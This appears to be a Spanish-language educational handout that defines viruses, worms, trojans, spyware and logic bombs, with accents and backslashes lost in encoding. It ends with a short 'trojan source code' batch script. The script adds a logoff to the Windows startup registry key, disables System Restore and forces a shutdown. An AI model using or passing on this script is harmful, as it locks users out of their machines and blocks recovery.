Professional Documents
Culture Documents
Los software nocivos son aquello programas informticos creados por los mismos
usuarios a fin de aprovechar las vulnerabilidades encontradas en los diferentes Sistemas
Operativos que circulan actualmente en el mercado (Windows, MacOS, Linux, Android,
etc.)
Son muchas las manifestaciones negativas en el mbito informtico, una de las ms
conocidas por su repercusin son los llamados Malwares o programas dainos, que son
utilizados para realizar daos lgicos o sea son daos causados a la informacin y todos
los medios lgicos de los cuales se vale un sistema informtico para funcionar
adecuadamente. Las variaciones de estos malware se han denominado bajo distintos
conceptos, cada cual teniendo una particularidad, entre los principales encontramos:
VIRUS INFORMTICO
GUSANO INFORMTICO
A diferencia de un virus, un gusano no precisa
alterar los archivos de programas, sino que reside en
la memoria y se duplica a s mismo. El principal
objetivo es infectar a la mayor cantidad posible de
usuarios, y tambin puede contener instrucciones
dainas al igual que los virus. Saturan el ancho de
banda de la red
TROYANOS
Los troyanos son programas maliciosos que
estn disfrazados como algo inocuo o
atractivo que invitan al usuario a ejecutarlo
ocultando un software malicioso.
Los troyanos conocidos como droppers son
usados para empezar la propagacin de un
gusano inyectndolo dentro de la red local
de un usuario. Una de las formas ms
comunes para distribuir spyware es
mediante troyanos unidos a software
deseable descargado de Internet.
SPYWARE
Es programa espa que recopila informacin de un
ordenador y despus transmite esta informacin a
una entidad externa sin el conocimiento o el
consentimiento del propietario del ordenador.
Sin embargo, a diferencia de los virus, no se
intenta replicar en otros ordenadores, por lo que
funciona como un parsito. Algunos ejemplos de
programas espa conocidos son Gator, o Bonzi
Buddy.
BOMBA LGICA
Es una parte de cdigo insertada intencionalmente en un programa informtico que
permanece oculto hasta cumplirse una o ms condiciones pre programadas, en ese
momento se ejecuta una accin maliciosa.
Por ejemplo, un programador puede ocultar una
pieza de cdigo que comience a borrar archivos
cuando sea despedido de la compaa (en un
disparador de base de datos (trigger) que se
dispare al cambiar la condicin de trabajador
activo del programador).
APLICACIONES
CDIGO FUENTE DE TROYANO
reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v off /t reg_sz /d logoff.exe /f
Reg add hklmsoftwarePoliciesMicrosoftwindows NTSystemRestore /v DisableConfig /t
reg_dword /d 1
Reg add hklmsoftwarePoliciesMicrosoftwindows NTSystemRestore /v DisableSR /t
reg_dword /d 1
shu*** -s -t 5 -f -c "El ordenador se apagara debido a la incompetencia del usuario.